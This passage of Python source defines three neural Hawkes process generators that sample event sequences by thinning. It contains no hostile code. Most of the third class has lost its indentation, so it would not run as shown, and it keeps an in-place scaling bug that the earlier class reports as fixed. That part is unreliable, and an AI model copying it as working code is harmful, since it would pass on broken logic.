        Cast float_input to float32 and return its 32-bit big-endian
        IEEE-754 representation as a vector of 0.0 / 1.0 values.
        '''
        float32_input = numpy.float32(float_input)
        packed = struct.pack('!f', float32_input)
        # bytes iterate as ints on Python 3 but as 1-char strings on
        # Python 2; normalize before rendering each byte as 8 bits
        str_input = ''.join(
            format(b if isinstance(b, int) else ord(b), '08b')
            for b in packed
        )
        bit_input = numpy.zeros((self.dim_float,), dtype=dtype)
        assert self.dim_float == len(str_input)
        for idx, item_in_input in enumerate(str_input):
            bit_input[idx] = numpy.float32(item_in_input)
        return numpy.copy(bit_input)
    #
    def sigmoid(self, x):
        '''Logistic function mapping x to (0, 1).'''
        return 1 / (1 + numpy.exp(-x))
    #
    def compute_hidden_states(self):
        '''
        Run one LSTM step over the most recent event in self.one_seq,
        refreshing self.hidden_t and self.cell_t.
        '''
        last = self.one_seq[-1]
        emb_event_t = self.Emb_event[last['type_event'], :]
        # adaptive time features: hard_relu(dt - thresholds) with the
        # raw dt appended, embedded into model space
        dt = last['time_since_last_event']
        time_rep_t = numpy.concatenate(
            (self.hard_relu(dt - self.Threshold_time), dt[None]),
            axis=0
        )
        emb_time_t = numpy.dot(time_rep_t, self.Emb_time)
        post_transform = numpy.dot(
            numpy.concatenate(
                (emb_event_t, emb_time_t, self.hidden_t), axis=0
            ),
            self.W_recur
        ) + self.b_recur
        # the four gate pre-activations occupy consecutive
        # dim_model-sized slices of post_transform
        d = self.dim_model
        gate_input = self.sigmoid(post_transform[:d])
        gate_forget = self.sigmoid(post_transform[d:2 * d])
        gate_output = self.sigmoid(post_transform[2 * d:3 * d])
        gate_pre_c = numpy.tanh(post_transform[3 * d:])
        cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
        hidden_t_new = gate_output * numpy.tanh(cell_t_new)
        self.hidden_t = numpy.copy(hidden_t_new)
        self.cell_t = numpy.copy(cell_t_new)
    #
    def compute_intensity_given_past(self, time_current):
        '''Refresh self.intensity(_tilde) at time_current given past events.'''
        time_recent = self.one_seq[-1]['time_since_start']
        # positive per-(unit, type) decay rates
        delta = self.soft_relu(
            numpy.tensordot(self.hidden_t, self.W_delta, (0, 0))
        )
        # hidden state decayed since the last event;
        # shape (dim_model, dim_process), like self.W_alpha
        hidden_with_time = numpy.exp(
            -delta * (time_current - time_recent)
        ) * self.hidden_t[:, None]
        self.intensity_tilde = numpy.sum(
            self.W_alpha * hidden_with_time, axis=0
        ) + numpy.dot(self.hidden_t, self.W_mu)
        self.intensity = self.soft_relu(self.intensity_tilde)
    #
    def compute_intensity_upper_bound(self, time_current):
        '''
        Refresh self.intensity_ub(_tilde_ub): an upper bound on the
        intensity for all t >= time_current, used by thinning.
        '''
        time_recent = self.one_seq[-1]['time_since_start']
        delta = self.soft_relu(
            numpy.tensordot(self.hidden_t, self.W_delta, (0, 0))
        )
        hidden_with_time = numpy.exp(
            -delta * (time_current - time_recent)
        ) * self.hidden_t[:, None]
        # only the decaying part needs hard_relu; the base term
        # dot(hidden_t, W_mu) is time-invariant, so it is used as is
        self.intensity_tilde_ub = numpy.sum(
            self.hard_relu(self.W_alpha * hidden_with_time), axis=0
        ) + numpy.dot(self.hidden_t, self.W_mu)
        self.intensity_ub = self.soft_relu(self.intensity_tilde_ub)
    #
    def sample_time_given_type(self, type_event):
        '''
        Sample the next arrival time of type_event (the little k of the
        paper) by adaptive thinning: after every rejected proposal the
        upper bound is recomputed at the advanced time, which tightens
        it and speeds up acceptance.
        '''
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.copy(self.intensity_ub[type_event])
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(scale=1.0, size=None)
            U = numpy.random.uniform(low=0.0, high=1.0, size=None)
            time_current += (E / intensity_hazard)
            self.compute_intensity_given_past(time_current)
            # accept when U * bound <= true intensity
            u = U * intensity_hazard / self.intensity[type_event]
            # adaptive step: refresh the (decaying) bound at the new time
            self.compute_intensity_upper_bound(time_current)
            intensity_hazard = numpy.copy(self.intensity_ub[type_event])
        return time_current
    #
    def gen_one_seq(self, max_len):
        '''
        Generate one sequence of max_len events.

        Thinning algorithm (Liiniger 2009, p. 28): sample one candidate
        time per event type, keep the earliest, discard the rest.
        max_len is a pre-sampled sequence length.
        '''
        self.restart_sequence()
        time_since_start = numpy.float32(0.0)
        # most recent occurrence time of each event type
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        for _ in range(max_len):
            # fold the most recent event into the LSTM state first
            self.compute_hidden_states()
            time_of_happen = numpy.zeros((self.dim_process,), dtype=dtype)
            for type_event in range(self.dim_process):
                time_of_happen[type_event] = numpy.copy(
                    self.sample_time_given_type(type_event)
                )
            time_since_start_new = numpy.min(time_of_happen)
            type_event_new = numpy.argmin(time_of_happen)
            self.cnt_total_event += 1
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = (
                time_since_start
                - time_since_start_each_event[type_event_new]
            )
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
        # drop the BOS marker at the head of the sequence
        self.one_seq.pop(0)
    #
    def gen_seqs(self, settings):
        '''
        Generate settings['num_seqs'] sequences into self.list_seqs;
        each sequence length is uniform over [min_len, max_len].
        '''
        print("generating sequences ... ")
        num_seqs = settings['num_seqs']
        self.list_seqs = []
        cnt_seqs = 0
        while cnt_seqs < num_seqs:
            max_len = numpy.int32(
                round(
                    numpy.random.uniform(
                        low=settings['min_len'],
                        high=settings['max_len']
                    )
                )
            )
            self.gen_one_seq(max_len)
            self.list_seqs.append(self.one_seq)
            cnt_seqs += 1
            # progress report roughly every ten sequences
            if cnt_seqs % 10 == 9:
                print("idx seq of gen : ", (cnt_seqs, self.name))
                print("total number of seqs : ", num_seqs)
    #
    def print_some(self):
        '''Print events, times and inter-event gaps of the first 10 seqs.'''
        print("printing some seqs ... ")
        for idx_seq in range(10):
            print("the id of this seq is : ", idx_seq)
            seq = self.list_seqs[idx_seq]
            list_events = [item['type_event'] for item in seq]
            list_time = [
                round(item['time_since_start'], 4) for item in seq
            ]
            list_dtime = [
                round(item['time_since_last_event'], 4) for item in seq
            ]
            list_items = list(zip(list_events, list_dtime))
            print("the events, time and diff time for : ", idx_seq)
            print(list_events)
            print(list_time)
            print(list_dtime)
            print("the list of items is : ")
            print(list_items)
    #
    def save_seqs(self, file_save):
        '''Pickle the generated sequences in self.list_seqs to file_save.'''
        with open(file_save, 'wb') as f:
            pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen_time_scale(object):
    '''
    Sequence generator for an adaptive neural Hawkes process with a
    per-event-type scale on the softplus transfer of the intensity.

    Bug fixed here: soft_relu_scale used to divide its argument in
    place (`x /= self.scale`), silently mutating the caller's stored
    self.intensity_tilde / self.intensity_tilde_ub arrays.
    '''
    def __init__(self, settings):
        # settings keys used: 'args', 'path_pre_train' and, when
        # initializing randomly, 'dim_process', 'dim_LSTM', 'seed_random'
        print("initializing generator ... ")
        self.args = settings['args']
        self.dim_float = numpy.int32(32)
        if settings['path_pre_train'] is None:
            print("random parameters ... ")
            self.dim_process = settings['dim_process']
            self.dim_model = settings['dim_LSTM']
            self.dim_time = self.dim_float
            numpy.random.seed(settings['seed_random'])
            # unit scale for every event type (a random scale can be
            # substituted here if desired)
            self.scale = numpy.float32(
                numpy.ones((self.dim_process, ))
            )

            def _rand(shape, low=-1.0, high=1.0):
                # shared uniform float32 initializer; the call order
                # below matters: it consumes the seeded RNG stream
                return numpy.float32(
                    numpy.random.uniform(low=low, high=high, size=shape)
                )
            self.W_mu = _rand((self.dim_model, self.dim_process))
            self.W_delta = _rand(
                (self.dim_model, self.dim_model, self.dim_process)
            )
            self.W_alpha = _rand((self.dim_model, self.dim_process))
            # one extra embedding row for the BOS event type
            self.Emb_event = _rand(
                (self.dim_process + numpy.int32(1), self.dim_model)
            )
            # one extra input row for the raw (un-thresholded) time
            self.Emb_time = _rand(
                (self.dim_time + numpy.int32(1), self.dim_model)
            )
            self.Threshold_time = _rand((self.dim_time, ), low=0.0)
            self.W_recur = _rand(
                (3 * self.dim_model, 4 * self.dim_model)
            )
            self.b_recur = _rand((4 * self.dim_model, ))
        else:
            print("read pretrained model ... ")
            path_pre_train = os.path.abspath(settings['path_pre_train'])
            with open(path_pre_train, 'rb') as f:
                model_pre_train = pickle.load(f)
            self.dim_process = model_pre_train['dim_process']
            self.dim_model = model_pre_train['dim_model']
            self.dim_time = model_pre_train['dim_time']
            self.scale = model_pre_train['scale']
            self.W_mu = model_pre_train['W_mu']
            self.W_delta = model_pre_train['W_delta']
            self.W_alpha = model_pre_train['W_alpha']
            self.Emb_event = model_pre_train['Emb_event']
            self.Emb_time = model_pre_train['Emb_time']
            self.Threshold_time = model_pre_train['Threshold_time']
            self.W_recur = model_pre_train['W_recur']
            self.b_recur = model_pre_train['b_recur']
        #
        self.name = 'AdaptiveNeuralHawkesGen_time_scale'
        # cached intensities, refreshed by the compute_* methods
        self.intensity_tilde = None
        self.intensity = None
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        # every sequence starts with a BOS marker of the special event
        # type self.dim_process at time zero
        self.one_seq = [
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        ]
        self.hidden_t = numpy.zeros((self.dim_model, ), dtype=dtype)
        self.cell_t = numpy.zeros((self.dim_model, ), dtype=dtype)
        self.cnt_total_event = numpy.int32(len(self.one_seq))
        print("initialization done ")
    #
    def soft_relu(self, x):
        '''Softplus log(1 + exp(x)); keeps intensities and decays positive.'''
        return numpy.log(numpy.float32(1.0) + numpy.exp(x))
    #
    def soft_relu_scale(self, x):
        '''
        Scaled softplus scale * log(1 + exp(x / scale)), elementwise;
        the last dim of x matches dim_process.

        Bug fix: operates on a scaled copy instead of dividing x in
        place, which used to mutate the caller's array.
        '''
        scaled = x / self.scale
        y = numpy.log(numpy.float32(1.0) + numpy.exp(scaled))
        return y * self.scale
    #
    def hard_relu(self, x):
        '''Rectifier max(x, 0), written branch-free.'''
        return numpy.float32(0.5) * (x + numpy.abs(x))
    #
    def save_model(self, file_save):
        '''Pickle every parameter (incl. scale and thresholds) plus dims.'''
        print("saving model of generator ... ")
        model_dict = {
            'scale': numpy.copy(self.scale),
            'W_mu': numpy.copy(self.W_mu),
            'W_delta': numpy.copy(self.W_delta),
            'W_alpha': numpy.copy(self.W_alpha),
            'Emb_event': numpy.copy(self.Emb_event),
            'Emb_time': numpy.copy(self.Emb_time),
            'Threshold_time': numpy.copy(self.Threshold_time),
            'W_recur': numpy.copy(self.W_recur),
            'b_recur': numpy.copy(self.b_recur),
            'dim_process': self.dim_process,
            'dim_model': self.dim_model,
            'dim_time': self.dim_time,
            'dim_float': self.dim_float,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)
    #
    def restart_sequence(self):
        '''Reset cached intensities, the event list (fresh BOS) and LSTM state.'''
        self.intensity_tilde = None
        self.intensity = None
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        self.one_seq = [
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        ]
        self.hidden_t = numpy.zeros((self.dim_model, ), dtype=dtype)
        self.cell_t = numpy.zeros((self.dim_model, ), dtype=dtype)
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    def float32_to_bit(self, float_input):
        '''
        Cast float_input to float32 and return its 32-bit big-endian
        IEEE-754 representation as a vector of 0.0 / 1.0 values.
        '''
        float32_input = numpy.float32(float_input)
        packed = struct.pack('!f', float32_input)
        # bytes iterate as ints on Python 3 but as 1-char strings on
        # Python 2; normalize before rendering each byte as 8 bits
        str_input = ''.join(
            format(b if isinstance(b, int) else ord(b), '08b')
            for b in packed
        )
        bit_input = numpy.zeros((self.dim_float,), dtype=dtype)
        assert self.dim_float == len(str_input)
        for idx, item_in_input in enumerate(str_input):
            bit_input[idx] = numpy.float32(item_in_input)
        return numpy.copy(bit_input)
    #
    def sigmoid(self, x):
        '''Logistic function mapping x to (0, 1).'''
        return 1 / (1 + numpy.exp(-x))
    #
    def compute_hidden_states(self):
        '''
        Run one LSTM step over the most recent event in self.one_seq,
        refreshing self.hidden_t and self.cell_t.
        '''
        last = self.one_seq[-1]
        emb_event_t = self.Emb_event[last['type_event'], :]
        # adaptive time features: hard_relu(dt - thresholds) with the
        # raw dt appended, embedded into model space
        dt = last['time_since_last_event']
        time_rep_t = numpy.concatenate(
            (self.hard_relu(dt - self.Threshold_time), dt[None]),
            axis=0
        )
        emb_time_t = numpy.dot(time_rep_t, self.Emb_time)
        post_transform = numpy.dot(
            numpy.concatenate(
                (emb_event_t, emb_time_t, self.hidden_t), axis=0
            ),
            self.W_recur
        ) + self.b_recur
        # the four gate pre-activations occupy consecutive
        # dim_model-sized slices of post_transform
        d = self.dim_model
        gate_input = self.sigmoid(post_transform[:d])
        gate_forget = self.sigmoid(post_transform[d:2 * d])
        gate_output = self.sigmoid(post_transform[2 * d:3 * d])
        gate_pre_c = numpy.tanh(post_transform[3 * d:])
        cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
        hidden_t_new = gate_output * numpy.tanh(cell_t_new)
        self.hidden_t = numpy.copy(hidden_t_new)
        self.cell_t = numpy.copy(cell_t_new)
    #
    def compute_intensity_given_past(self, time_current):
        '''Refresh self.intensity(_tilde) at time_current given past events.'''
        time_recent = self.one_seq[-1]['time_since_start']
        # positive per-(unit, type) decay rates
        delta = self.soft_relu(
            numpy.tensordot(self.hidden_t, self.W_delta, (0, 0))
        )
        # hidden state decayed since the last event;
        # shape (dim_model, dim_process), like self.W_alpha
        hidden_with_time = numpy.exp(
            -delta * (time_current - time_recent)
        ) * self.hidden_t[:, None]
        self.intensity_tilde = numpy.sum(
            self.W_alpha * hidden_with_time, axis=0
        ) + numpy.dot(self.hidden_t, self.W_mu)
        self.intensity = self.soft_relu_scale(self.intensity_tilde)
    #
    def compute_intensity_upper_bound(self, time_current):
        '''
        Refresh self.intensity_ub(_tilde_ub): an upper bound on the
        intensity for all t >= time_current, used by thinning.
        '''
        time_recent = self.one_seq[-1]['time_since_start']
        delta = self.soft_relu(
            numpy.tensordot(self.hidden_t, self.W_delta, (0, 0))
        )
        hidden_with_time = numpy.exp(
            -delta * (time_current - time_recent)
        ) * self.hidden_t[:, None]
        # only the decaying part needs hard_relu; the base term
        # dot(hidden_t, W_mu) is time-invariant, so it is used as is
        self.intensity_tilde_ub = numpy.sum(
            self.hard_relu(self.W_alpha * hidden_with_time), axis=0
        ) + numpy.dot(self.hidden_t, self.W_mu)
        self.intensity_ub = self.soft_relu_scale(self.intensity_tilde_ub)
    #
    def sample_time_given_type(self, type_event):
        '''
        Sample the next arrival time of type_event (the little k of the
        paper) by thinning with a fixed upper bound.  An adaptive
        variant that refreshes the bound after each rejection can be
        toggled on if sampling proves slow.
        '''
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.copy(self.intensity_ub[type_event])
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(scale=1.0, size=None)
            U = numpy.random.uniform(low=0.0, high=1.0, size=None)
            time_current += (E / intensity_hazard)
            self.compute_intensity_given_past(time_current)
            # accept when U * bound <= true intensity
            u = U * intensity_hazard / self.intensity[type_event]
        return time_current
    #
    def gen_one_seq(self, max_len):
        '''
        Generate one sequence of max_len events.

        Thinning algorithm (Liiniger 2009, p. 28): sample one candidate
        time per event type, keep the earliest, discard the rest.
        max_len is a pre-sampled sequence length.
        '''
        self.restart_sequence()
        time_since_start = numpy.float32(0.0)
        # most recent occurrence time of each event type
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        for _ in range(max_len):
            # fold the most recent event into the LSTM state first
            self.compute_hidden_states()
            time_of_happen = numpy.zeros((self.dim_process,), dtype=dtype)
            for type_event in range(self.dim_process):
                time_of_happen[type_event] = numpy.copy(
                    self.sample_time_given_type(type_event)
                )
            time_since_start_new = numpy.min(time_of_happen)
            type_event_new = numpy.argmin(time_of_happen)
            self.cnt_total_event += 1
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = (
                time_since_start
                - time_since_start_each_event[type_event_new]
            )
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
        # drop the BOS marker at the head of the sequence
        self.one_seq.pop(0)
    #
    def gen_seqs(self, settings):
        '''
        Generate settings['num_seqs'] sequences into self.list_seqs;
        each sequence length is uniform over [min_len, max_len].
        '''
        print("generating sequences ... ")
        num_seqs = settings['num_seqs']
        self.list_seqs = []
        cnt_seqs = 0
        while cnt_seqs < num_seqs:
            max_len = numpy.int32(
                round(
                    numpy.random.uniform(
                        low=settings['min_len'],
                        high=settings['max_len']
                    )
                )
            )
            self.gen_one_seq(max_len)
            self.list_seqs.append(self.one_seq)
            cnt_seqs += 1
            # progress report roughly every ten sequences
            if cnt_seqs % 10 == 9:
                print("idx seq of gen : ", (cnt_seqs, self.name))
                print("total number of seqs : ", num_seqs)
    #
    def print_some(self):
        '''Print events, times and inter-event gaps of the first 10 seqs.'''
        print("printing some seqs ... ")
        for idx_seq in range(10):
            print("the id of this seq is : ", idx_seq)
            seq = self.list_seqs[idx_seq]
            list_events = [item['type_event'] for item in seq]
            list_time = [
                round(item['time_since_start'], 4) for item in seq
            ]
            list_dtime = [
                round(item['time_since_last_event'], 4) for item in seq
            ]
            list_items = list(zip(list_events, list_dtime))
            print("the events, time and diff time for : ", idx_seq)
            print(list_events)
            print(list_time)
            print(list_dtime)
            print("the list of items is : ")
            print(list_items)
    #
    def save_seqs(self, file_save):
        '''Pickle the generated sequences in self.list_seqs to file_save.'''
        with open(file_save, 'wb') as f:
            pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen_time_scale_reduce(
object
):
'''
here is the sequence generator
using Neural Hawkes process with reduced decay param
'''
def __init__(self, settings):
#
print("initializing generator ... ")
self.args = settings['args']
self.dim_float = numpy.int32(32)
if settings['path_pre_train'] == None:
print("random parameters ... ")
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
self.dim_time = self.dim_float
#
numpy.random.seed(
settings['seed_random']
)
#
#self.scale = numpy.float32(
# numpy.random.uniform(
# low = 1e-3, high = 2.0,
# size = (self.dim_process, )
# )
#)
self.scale = numpy.float32(
numpy.ones( (self.dim_process, ) )
)
#
self.W_mu = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size = (
self.dim_model, self.dim_process
)
)
)
#
self.W_delta = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size=(
self.dim_model,
self.dim_model
)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time+numpy.int32(1),
self.dim_model
)
)
)
self.Threshold_time = numpy.float32(
numpy.random.uniform(
low = 0.0, high = 1.0,
size = (self.dim_time, )
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
else:
print("read pretrained model ... ")
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.dim_model = model_pre_train['dim_model']
self.dim_time = model_pre_train['dim_time']
#
self.scale = model_pre_train['scale']
self.W_mu = model_pre_train['W_mu']
self.W_delta = model_pre_train['W_delta']
self.W_alpha = model_pre_train['W_alpha']
self.Emb_event = model_pre_train['Emb_event']
self.Emb_time = model_pre_train['Emb_time']
self.Threshold_time = model_pre_train['Threshold_time']
self.W_recur = model_pre_train['W_recur']
self.b_recur = model_pre_train['b_recur']
#
#
#self.intensity = numpy.copy(self.mu)
self.name = 'AdaptiveNeuralHawkesGen_time_scale_reduce'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq) )
print("initialization done ")
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def soft_relu_scale(self, x):
# last dim of x is dim_process
x /= self.scale
y = numpy.log(numpy.float32(1.0)+numpy.exp(x))
y *= self.scale
return y
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'scale': numpy.copy(self.scale),
'W_mu': numpy.copy(self.W_mu),
'W_delta': numpy.copy(self.W_delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'Threshold_time': numpy.copy(self.Threshold_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
    def compute_hidden_states(self):
        """Advance the LSTM by one step using the most recent event.

        Reads the last entry of self.one_seq (the event generated at
        t_(rec(t))), embeds its type and inter-event time, and updates
        self.hidden_t / self.cell_t in place with a standard LSTM cell.
        """
        # every time it is called,
        # it computes the new hidden states of the LSTM
        # it gets the last event in the sequence
        # which is generated at t_(rec(t))
        # and compute its hidden states
        emb_event_t = self.Emb_event[
            self.one_seq[-1]['type_event'], :
        ]
        #
        # threshold features of the inter-event time: hard_relu(dt - c_i),
        # one feature per learned threshold in Threshold_time
        time_rep_t = self.hard_relu(
            self.one_seq[-1]['time_since_last_event'] - self.Threshold_time
        )
        # append the raw inter-event time itself as one extra feature
        # ([None] promotes the scalar to a length-1 axis for concatenate)
        time_rep_t = numpy.concatenate(
            (
                time_rep_t,
                self.one_seq[-1][
                    'time_since_last_event'
                ][None]
            ), axis = 0
        )
        emb_time_t = numpy.dot(
            time_rep_t, self.Emb_time
        )
        #
        # single affine map producing all four gate pre-activations at once
        # (W_recur: (3*dim_model, 4*dim_model))
        post_transform = numpy.dot(
            numpy.concatenate(
                (emb_event_t, emb_time_t, self.hidden_t),
                axis = 0
            ),
            self.W_recur
        ) + self.b_recur
        #
        # slice the stacked pre-activations into the four LSTM gates
        gate_input = self.sigmoid(
            post_transform[:self.dim_model]
        )
        gate_forget = self.sigmoid(
            post_transform[self.dim_model:2*self.dim_model]
        )
        gate_output = self.sigmoid(
            post_transform[2*self.dim_model:3*self.dim_model]
        )
        gate_pre_c = numpy.tanh(
            post_transform[3*self.dim_model:]
        )
        #
        # standard LSTM cell/state update
        cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
        hidden_t_new = gate_output * numpy.tanh(cell_t_new)
        self.hidden_t = numpy.copy(hidden_t_new)
        self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
time_recent = self.one_seq[-1]['time_since_start']
# W_delta : dim_model * dim_model
delta = self.soft_relu(
numpy.dot(
self.hidden_t, self.W_delta
)
)
# dim_model
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t
# dim_model
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.dot(
hidden_with_time, self.W_alpha
) + numpy.dot(
self.hidden_t, self.W_mu
)
#
self.intensity = self.soft_relu_scale(
self.intensity_tilde
)
# intensity computation is finished
#
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.dot(
self.hidden_t, self.W_delta
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t
# hidden_with_time : dim_model
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time[:, None]
),
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
# this part is time-invariant so
# we do not need to take its hard_relu
#self.hard_relu(
# numpy.dot(
# self.hidden_t, self.W_mu
# )
#)
#
self.intensity_ub = self.soft_relu_scale(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
    def sample_time_given_type(self, type_event):
        """Sample the next occurrence time of one event type by thinning.

        Uses Ogata's thinning: propose waiting times from an exponential
        with rate equal to the intensity upper bound, then accept with
        probability intensity(t) / bound. Returns the accepted absolute
        time (time_since_start scale). Mutates self.intensity* caches as
        a side effect of the intensity computations.
        """
        # type_event is the type of event for which we want to sample the time
        # it is the little k in our model formulation in paper
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        #
        #self.compute_intensity(time_current)
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.copy(
            self.intensity_ub[type_event]
        )
        #
        # u > 1 means "rejected"; start above 1 so the loop runs at least once
        u = 1.5
        while u >= 1.0:
            #print("type is : ", type_event)
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            #print("E U time_current : ")
            #print(E, U, time_current)
            #print("intensity hazard is : ")
            #print(intensity_hazard)
            # propose the next candidate time from the bounding process
            time_current += (E / intensity_hazard)
            self.compute_intensity_given_past(time_current)
            # accept iff U < intensity/bound, i.e. u < 1
            u = U * intensity_hazard / self.intensity[type_event]
            #print("new time_current and u : ")
            #print(time_current, u)
            #print("intensity and upper bound is : ")
            #print(self.intensity)
            #print(self.intensity_ub)
            # use adaptive thinning algorithm
            # that is, decreasing the upper bound
            # to make the sampling quicker
            # use adaptive method by
            # toggling on the following block
            '''
            self.compute_intensity_upper_bound(
                time_current
            )
            intensity_hazard = numpy.copy(
                self.intensity_ub[type_event]
            )
            '''
        return time_current
#
#
#
    def gen_one_seq(self, max_len):
        """Generate one event sequence of length max_len.

        For every step, one candidate time is sampled per event type via
        thinning; the earliest candidate wins and is appended to
        self.one_seq. The BOS placeholder is removed at the end, so
        self.one_seq holds exactly max_len real events afterwards.
        """
        self.restart_sequence()
        '''
        Liiniger (2009), p. 28, describes a "thinning algorithm":
        generate one event of each type, take the minimum,
        and discard the others.
        Details found in my paper write-up
        max_len is a pre-sampled value to set the length of seq
        '''
        # initialize the seq
        time_since_start = numpy.float32(0.0)
        # per-type time of the most recent occurrence (for
        # time_since_last_same_event bookkeeping)
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        #
        for idx_event in range(max_len):
            time_of_happen = numpy.zeros(
                (self.dim_process,), dtype=dtype
            )
            #
            # compute the hidden states
            # of the most recent event in sequence
            self.compute_hidden_states()
            #
            for type_event in range(self.dim_process):
                # sample one event using "thinning algorithm"
                time_of_happen[type_event] = numpy.copy(
                    self.sample_time_given_type(
                        type_event
                    )
                )
            #
            # the earliest candidate time determines the next event
            time_since_start_new = numpy.min(time_of_happen)
